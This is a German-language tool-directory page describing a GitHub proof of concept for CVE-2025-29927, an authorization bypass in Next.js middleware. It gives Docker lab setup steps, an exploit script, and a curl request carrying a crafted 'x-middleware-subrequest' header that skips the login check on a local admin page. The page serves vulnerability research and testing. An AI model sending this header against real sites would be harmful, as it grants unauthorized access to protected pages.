Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
nextjs-middleware-exploit — Forschung zur Next.js-Middleware-Sicherheitslücke (CVE-2025-29927), die eine Autorisierungsumgehung und potenzielle Exploits ermöglicht. | Kitploit
Tools/GitHubGitHub/l1uk/nextjs-middleware-exploit
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsAuthentifizierungLernen & Bildung
GitHubl1uk/nextjs-middleware-exploit

nextjs-middleware-exploit

Forschung zur Next.js-Middleware-Sicherheitslücke (CVE-2025-29927), die eine Autorisierungsumgehung und potenzielle Exploits ermöglicht.

Repository anzeigen
vor 1 JahrNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

Next.js Middleware Schwachstellenforschung (CVE-2025-29927)

Dieses Repository zeigt eine kritische Schwachstelle in Next.js Middleware (CVE-2025-29927), die die Versionen 11.1.4 bis 15.1.7 betrifft. Diese Schwachstelle ermöglicht Autorisierungsumgehung, CSP-Umgehung und potenzielle DoS-Angriffe durch Cache-Vergiftung. Das Problem liegt in der Art und Weise, wie der x-middleware-subrequest-Header behandelt wird, was Angreifern erlaubt, Middleware-Schutzmechanismen zu umgehen.

Dieser Proof of Concept ist spezifisch für die Schwachstelle in v12

Verwendung

Umgebungseinrichtung

Richten Sie die anfällige Umgebung mit Docker und den Dateien aus diesem Repository ein, indem Sie Folgendes ausführen:

root@kitploit:~
git clone https://github.com/l1uk/nextjs-middleware-exploit.git
cd nextjs-middleware-exploit
docker build -t my-next-app .
docker run -p 3000:3000 my-next-app

Exploit

Dieses Repository enthält das bereits erstellte Skript exploit.sh, um die Ausnutzung der Schwachstelle zu testen. Um es zu testen, führen Sie Folgendes aus:

root@kitploit:~
chmod +x exploit.sh
./exploit.sh

Zusätzlich können Sie die Ausnutzung der Schwachstelle testen, indem Sie Folgendes versuchen:

  1. Fordern Sie die Admin-Seite ohne Authentifizierung an. Sie sollten eine Weiterleitung zur login-Seite erhalten.
root@kitploit:~
curl -i http://localhost:3000/admin
  1. Fordern Sie die Seite ohne Authentifizierung an, aber mit dem x-middleware-subrequest-Header. Sie sollten in der Lage sein, die Authentifizierungsseite zu umgehen.
root@kitploit:~
curl -i -H "x-middleware-subrequest: pages/_middleware" http://localhost:3000/admin

Sicherheitshinweis

  • CVE-2025-29927: Link zum Sicherheitshinweis
Tool herunterladen